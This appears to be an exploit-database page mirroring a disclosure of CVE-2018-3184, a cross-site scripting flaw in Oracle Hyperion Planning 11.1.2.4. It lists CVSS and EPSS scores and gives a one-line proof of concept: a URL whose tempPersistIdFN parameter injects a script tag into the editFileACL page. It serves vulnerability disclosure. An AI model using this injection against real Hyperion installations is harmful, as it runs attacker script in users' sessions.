Advertisement






Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting

CVE Category Price Severity
CVE-2018-3184 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2018-10-27
CPE
cpe:cpe:/a:oracle:hyperion_planning:11.1.2.4
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100236

Below is a copy:

Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting
# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting
# Date: 2018-10-16
# Exploit Author: Hasan Alqawzai
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/
# Version: 11.1.2.4
# Tested on: Windows
# CVE : CVE-2018-3184

# Description : 
It was detected cross-site scripting , which allows an attacker to execute a dynamic script in the context of the application. 

# Prerequisites :
Access to Oracle Hyperion 

# PoC Exploit: XSS
https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";</script><script>alert(/hasan/)</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.